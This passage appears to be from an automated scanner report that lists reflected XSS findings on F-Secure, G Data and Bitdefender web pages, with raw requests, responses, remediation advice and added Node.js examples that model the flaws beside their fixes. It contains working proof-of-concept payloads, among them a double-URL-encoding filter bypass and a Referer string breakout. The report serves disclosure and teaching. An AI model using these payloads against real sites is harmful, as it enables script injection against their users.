Cookie: fs_af=0; s_vnum=1321979166309%26vn%3D1; s_prop14=1st visit; s_cpmstack=%5B%5B'Referring%2520Domains'%2C'1319387166312'%5D%5D; s_vi=[CS]v1|2752200F851D39B0-6000012900208E42[CE]; s_prop_14=Referring%20Domains; js_user_locale=en_GLOBAL; s_cc=true; s_ppv=50; s_var_3=browse; s_invisit=true; s_nr=1319387753449-New; s_pv=home%3Aglobal%3Aen%3Aprotection%3Ainternet%20security%3Aoverview; s_sq=fsecure%3D%2526pid%253Dhome%25253Aglobal%25253Aen%25253Aprotection%25253Ainternet%252520security%25253Aoverview%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.f-secure.com%25252Fen%25252Fweb%25252Fhome_global%25252Fnews-info%25252Fproduct-news-offers%25252Fview%25252Fstory%25252F463302%25252FF-Secure%252525%2526ot%253DA; country=US

Response

HTTP/1.1 200 OK
Server: Apache
ETag: 3a8dec73
Content-Type: text/html;charset=UTF-8
Content-Length: 65894
Date: Sun, 23 Oct 2011 16:36:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: country=US; path=/; domain=f-secure.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta
...[SNIP]...
ecure.com/en/web/home_global/news-info/product-news-offers/view/-/story/?p_p_id=articlereading_WAR_weblatestcontent&p_p_lifecycle=2&p_p_cacheability=cacheLevelPage&_articlereading_WAR_weblatestcontent_91193-->0fa78608273=1&_articlereading_WAR_weblatestcontent_articleId=463302";<c:choose>
...[SNIP]...

1.107. http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91771/Parenting%20the%20digital%20natives [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.f-secure.com
Path:   /en/web/home_global/news-info/security-stories/view/story/91771/Parenting%20the%20digital%20natives

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d08dd-->9a57a6a40cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/web/home_global/news-info/security-stories/view/story/91771/Parenting%20the%20digital%20natives?d08dd-->9a57a6a40cd=1 HTTP/1.1
Host: www.f-secure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1321979166309%26vn%3D1; s_prop14=1st visit; s_cpmstack=%5B%5B'Referring%2520Domains'%2C'1319387166312'%5D%5D; s_vi=[CS]v1|2752200F851D39B0-6000012900208E42[CE]; fs_af=0; js_user_locale=en_GLOBAL; s_cc=true; country=US; s_ppv=41; s_var_3=browse; s_invisit=true; s_nr=1319387935730-New; s_pv=home%3Aglobal%3Aen%3Anews%3Asecurity%20stories%3Aarticle; s_prop_14=Did%20not%20bounce; s_sq=fsecure%3D%2526pid%253Dhome%25253Aglobal%25253Aen%25253Anews%25253Asecurity%252520stories%25253Aarticle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.f-secure.com%25252Fen%25252Fweb%25252Fhome_global%25252Fnews-info%25252Fsecurity-stories%25252Fview%25252Fstory%25252F91771%25252FParenting%25252520t%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
ETag: 8f9a85e7
Content-Type: text/html;charset=UTF-8
Content-Length: 67783
Date: Sun, 23 Oct 2011 16:39:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: country=US; path=/; domain=f-secure.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta
...[SNIP]...
f-secure.com/en/web/home_global/news-info/security-stories/view/-/story/?p_p_id=articlereading_WAR_weblatestcontent&p_p_lifecycle=2&p_p_cacheability=cacheLevelPage&_articlereading_WAR_weblatestcontent_d08dd-->9a57a6a40cd=1&_articlereading_WAR_weblatestcontent_articleId=91771";<c:choose>
...[SNIP]...

1.108. http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.f-secure.com
Path:   /en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 67238-->b40d34bef0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping?67238-->b40d34bef0d=1 HTTP/1.1
Host: www.f-secure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.f-secure.com/en/web/home_global/news/security-stories
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1321979166309%26vn%3D1; s_prop14=1st visit; s_cpmstack=%5B%5B'Referring%2520Domains'%2C'1319387166312'%5D%5D; s_vi=[CS]v1|2752200F851D39B0-6000012900208E42[CE]; fs_af=0; js_user_locale=en_GLOBAL; country=US; s_cc=true; s_ppv=52; s_var_3=browse; s_invisit=true; s_nr=1319387931067-New; s_pv=home%3Aglobal%3Aen%3Anews%3Asecurity%20stories; s_prop_14=Did%20not%20bounce; s_sq=fsecure%3D%2526pid%253Dhome%25253Aglobal%25253Aen%25253Anews%25253Asecurity%252520stories%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.f-secure.com%25252Fen%25252Fweb%25252Fhome_global%25252Fnews-info%25252Fsecurity-stories%25252Fview%25252Fstory%25252F91782%25252FSafer%25252520onlin%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
ETag: 784478
Content-Type: text/html;charset=UTF-8
Content-Length: 66731
Date: Sun, 23 Oct 2011 16:39:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: country=US; path=/; domain=f-secure.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta
...[SNIP]...
f-secure.com/en/web/home_global/news-info/security-stories/view/-/story/?p_p_id=articlereading_WAR_weblatestcontent&p_p_lifecycle=2&p_p_cacheability=cacheLevelPage&_articlereading_WAR_weblatestcontent_67238-->b40d34bef0d=1&_articlereading_WAR_weblatestcontent_articleId=91782";<c:choose>
...[SNIP]...

1.109. http://www.gdatasoftware.co.uk/online-shop/anti-virus-produkte/shop/23-private-user/1594-g-data-totalcare-2012.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gdatasoftware.co.uk
Path:   /online-shop/anti-virus-produkte/shop/23-private-user/1594-g-data-totalcare-2012.html

Issue detail

The value of REST URL parameter 4 (the fourth path segment, which in the original URL is 23-private-user) is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c125c%253c%252fscript%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e22c05e6234 was submitted in REST URL parameter 4. This input was echoed as c125c</script><x style=x:expression(alert(1))>22c05e6234 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The </script> in the payload closes the script block into which the value is reflected, so everything after it is parsed as HTML by any browser; the <x style=x:expression(alert(1))> that follows uses a dynamically evaluated CSS expression in a style attribute to run JavaScript, a technique that is specific to Internet Explorer and may not work on other browsers. An attacker is not limited to that vector, since any HTML, including a new <script> element, could follow the closing tag.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding them: for example, submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter objects to; the application then URL-decodes the value a second time, turning %3c into < after validation has already taken place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, never before it. Where the value must be written into a JavaScript string, it should be encoded for that context so that quotes, backslashes, line terminators and the < of a closing </script> tag cannot appear literally in the output.
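The following is an added example, not code from the XSS.CX report or from the G Data site. It models the decode-then-validate ordering flaw described above in Node.js: a stand-in for the web server decodes the path segment once, a naive filter checks the result, and the application decodes it again. The function names are hypothetical; the payloads are the double-encoded one from the report and its single-encoded form. Both fixes from the remediation text are shown beside the vulnerable pipeline.

```javascript
// Added example, not code from the XSS.CX report or from the G Data site.
// Models the decode/validate ordering described for REST URL parameter 4:
// the web server URL-decodes the path once, the application filters the
// result, then URL-decodes it a second time. Function names are
// hypothetical; the payloads are the double-encoded one from the report and
// its single-encoded form.

// Stand-in for the web server's single URL-decode of a path segment.
function serverDecode(rawSegment) {
  return decodeURIComponent(rawSegment);
}

// Naive blacklist filter: rejects values containing common XSS characters.
function looksDangerous(value) {
  return /[<>"'()]/.test(value);
}

// Vulnerable pipeline: validate the once-decoded value, then decode again.
// '%253c' arrives as '%3c' (passes the filter) and becomes '<' afterwards.
function vulnerablePipeline(rawSegment) {
  const onceDecoded = serverDecode(rawSegment);
  if (looksDangerous(onceDecoded)) return { accepted: false, value: null };
  const twiceDecoded = decodeURIComponent(onceDecoded); // the bug
  return { accepted: true, value: twiceDecoded };
}

// Fix A (the report's recommendation): drop the second decode entirely.
function fixedNoSecondDecode(rawSegment) {
  const onceDecoded = serverDecode(rawSegment);
  if (looksDangerous(onceDecoded)) return { accepted: false, value: null };
  return { accepted: true, value: onceDecoded };
}

// Fix B: if a second decode is genuinely required, canonicalise first and
// validate the final form, so the filter sees what the page will receive.
function fixedValidateAfterCanonicalise(rawSegment) {
  const canonical = decodeURIComponent(serverDecode(rawSegment));
  if (looksDangerous(canonical)) return { accepted: false, value: null };
  return { accepted: true, value: canonical };
}

// Payload exactly as submitted in the report (double URL-encoded).
const DOUBLE_ENCODED =
  'c125c%253c%252fscript%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e22c05e6234';
// The same payload single-encoded, which the filter does catch.
const SINGLE_ENCODED =
  'c125c%3c%2fscript%3e%3cx%20style%3dx%3aexpression%28alert%281%29%29%3e22c05e6234';

// Runs each pipeline against both payloads. Only the vulnerable pipeline
// ends up accepting a value that contains a literal '<'.
function compare() {
  const pipelines = { vulnerablePipeline, fixedNoSecondDecode, fixedValidateAfterCanonicalise };
  const results = {};
  for (const [name, fn] of Object.entries(pipelines)) {
    results[name] = { double: fn(DOUBLE_ENCODED), single: fn(SINGLE_ENCODED) };
  }
  return results;
}

console.log(JSON.stringify(compare(), null, 2));
```

Running the block prints one entry per pipeline. The vulnerable one rejects the single-encoded payload (so the filter looks effective in casual testing) yet passes the double-encoded payload through as c125c</script><x style=x:expression(alert(1))>22c05e6234, exactly the string the report shows being echoed; Fix A leaves the value as harmless percent-escapes, and Fix B rejects it outright.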

Request

GET /online-shop/anti-virus-produkte/shop/c125c%253c%252fscript%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e22c05e6234/1594-g-data-totalcare-2012.html HTTP/1.1
Host: www.gdatasoftware.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gdatasoftware.co.uk/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=fb2bc7e9411fd949462370458ef664c7; __utma=3253734.1808878171.1319387172.1319387172.1319387172.1; __utmb=3253734.1.10.1319387172; __utmc=3253734; __utmz=3253734.1319387172.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; fe_typo_user=9e47734d193c7c01b4e215dc8b650e73

Response

HTTP/1.0 200 OK
Date: Sun, 23 Oct 2011 16:30:05 GMT
Server: Apache/2
Set-Cookie: fe_typo_user=af0a0cc738e2ed29558b0e61e76b6e1a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.gdata.de
X-Cache-Lookup: MISS from www.gdata.de:80
Via: 1.1 www.gdata.de:80 (squid)
Connection: close

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <m
...[SNIP]...
ddIgnoredOrganic("gdata.de");
   pageTracker._addIgnoredRef("gdata.de");
   pageTracker._addIgnoredRef(" www.gdata.de");
   pageTracker._initData();
   pageTracker._trackPageview('/Welcome/Online Shop/Details/c125c</script><x style=x:expression(alert(1))>22c05e6234-/1594 G Data TotalCare 2012');
   </script>
...[SNIP]...

1.110. http://www.bitdefender.com/solutions/total-security.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bitdefender.com
Path:   /solutions/total-security.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2646c'-alert(1)-'3a10773e75d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user: a web page cannot set the Referer header of a cross-site request directly. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. An attacker also influences the Referer indirectly through the URL of the page that links to the target, subject to whatever encoding the victim's browser applies to that URL before sending it. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If the referrer must be exposed to client-side script, it should be encoded for a JavaScript string context rather than concatenated between single quotes, so that a ' in the header cannot terminate the string literal and a </script> in it cannot end the script element.
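The following is an added example, not code from the XSS.CX report or from the Bitdefender site. It reproduces in Node.js the reflection visible in the response below, where the Referer header is concatenated into var referer='...', and sets a context-aware encoder beside it. The function names are hypothetical; the payload is the one from the report. A stubbed alert() stands in for the browser so the effect of each template can be observed.

```javascript
// Added example, not code from the XSS.CX report or from the Bitdefender site.
// Models the reflection shown in the response: a request header is written
// into <script>var referer='...';</script> by string concatenation.
// Function names are hypothetical; the payload is the one from the report.

// Vulnerable: the raw header lands inside a single-quoted JS string literal.
function vulnerableScript(refererHeader) {
  return "var referer='" + refererHeader + "';";
}

// Safe: build the literal with JSON.stringify (escapes quotes, backslashes
// and control characters), then also \u-escape the characters JSON leaves
// alone but that matter inside a <script> element: '<' and '>' so that a
// "</script>" in the data cannot end the element, '&' to stay safe if the
// same value is ever emitted into an HTML attribute, and the U+2028/U+2029
// line terminators, which JS string literals could not contain before ES2019.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function safeScript(refererHeader) {
  return 'var referer=' + jsStringLiteral(refererHeader) + ';';
}

// Executes a generated script with a stubbed alert(), reporting what the
// script assigned to `referer` and whether alert() ran. new Function is used
// only to observe the generated code; it plays the role of the browser here.
function execute(script) {
  const alertCalls = [];
  const fakeAlert = (...args) => { alertCalls.push(args); return 0; };
  const run = new Function('alert', script + '\nreturn referer;');
  const referer = run(fakeAlert);
  return { referer, alertCalled: alertCalls.length > 0 };
}

// Payload exactly as submitted in the Referer header in the report.
const REFERER_PAYLOAD = "2646c'-alert(1)-'3a10773e75d";

// Side-by-side result for one header value.
function demonstrate(payload = REFERER_PAYLOAD) {
  return {
    vulnerable: execute(vulnerableScript(payload)),
    safe: execute(safeScript(payload)),
  };
}

console.log(vulnerableScript(REFERER_PAYLOAD));
console.log(safeScript(REFERER_PAYLOAD));
console.log(demonstrate());
```

With the concatenated template the generated statement is var referer='2646c'-alert(1)-'3a10773e75d';, which the engine evaluates as a subtraction and therefore calls alert(1) before assigning NaN to referer. With the encoded template referer holds the header value unchanged and nothing executes. The stub cannot show the HTML-level break-out that a </script> payload would cause in a real page, which is why the encoder escapes < and > as well; the generated literal stays valid JavaScript and decodes back to the original characters at runtime.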

Request

GET /solutions/total-security.html HTTP/1.1
Host: www.bitdefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: 2646c'-alert(1)-'3a10773e75d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=petb44jdlc8qgivr4dpdes0761; tagit_session=1; s_vi=[CS]v1|27522009851D3806-400001366000BD01[CE]; _country=us; s_cc=true; s_sq=bitdefendercomdev%3D%2526pid%253Dus%25253Astore%25253Alistsolutions%2526pidt%253D1%2526oid%253Dhttp%25253A//www.bitdefender.com/solutions/total-security.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:33:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _country=us; path=/; domain=.bitdefender.com
Content-Type: text/html
Content-Length: 56114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<script>var referer='2646c'-alert(1)-'3a10773e75d';</script>
...[SNIP]...
